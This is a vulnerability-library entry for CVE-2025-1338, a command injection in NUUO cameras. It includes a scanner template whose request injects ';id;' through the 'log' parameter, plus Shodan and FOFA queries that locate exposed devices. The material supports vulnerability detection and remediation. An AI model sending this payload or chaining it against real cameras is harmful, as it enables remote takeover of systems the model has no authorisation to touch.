/Vulnerability Library

NUUO Camera <=20250203 - OS Command Injection

CVE-2025-1338
Verified

Description

NUUO Camera up to 20250203 contains a command injection caused by manipulation of the 'log' argument in /handle_config.php, letting remote attackers execute arbitrary commands, exploit requires remote access.

Severity

Critical

Exploit Probability

52%

Published Date

February 11, 2026

Template Author

ark

CVE-2025-1338.yaml
id: CVE-2025-1338

info:
  name: NUUO Camera <=20250203 - OS Command Injection
  author: Ark
  severity: critical
  description: |
    NUUO Camera up to 20250203 contains a command injection caused by manipulation of the 'log' argument in /handle_config.php, letting remote attackers execute arbitrary commands, exploit requires remote access.
  impact: |
    Remote attackers can execute arbitrary commands on the system, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of NUUO Camera or apply security patches provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1338
    - https://github.com/advisories/GHSA-vw58-vgp6-39qx
    - https://dbugs.ptsecurity.com/vulnerability/CVE-2025-1338
  classification:
    cve-id: CVE-2025-1338
    epss-score: 0.51881
    epss-percentile: 0.98819
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Network Video Recorder Login"
    fofa-query: title="Network Video Recorder Login" || body="www.nuuo.com"
  tags: cve,cve2025,nuuo,camera,rce,cmdi,intrusive,vkev

http:
  - raw:
      - |
        GET /handle_config.php?log=;id; HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "/mtd/block4/log/", "uid=", "gid=")'
        condition: and
# digest: 4a0a00473045022100ba5766bf0f613cdfe5d2d2475374a3587d8a4cc7eec2db86bb44cc1ae7b5b61c02202d72d762a36727f3cfc3b4cae156c5afb84dd239553f5cb4393e19af86e4a3b7:922c64590222798bb761d5b6d8e72950
9.5Severity

CVSS Metrics

CVE ID:
cve-2025-1338
CWE ID:
cwe-78

References

https://nvd.nist.gov/vuln/detail/CVE-2025-1338https://github.com/advisories/GHSA-vw58-vgp6-39qxhttps://dbugs.ptsecurity.com/vulnerability/CVE-2025-1338

Remediation Steps

Update to the latest version of NUUO Camera or apply security patches provided by the vendor.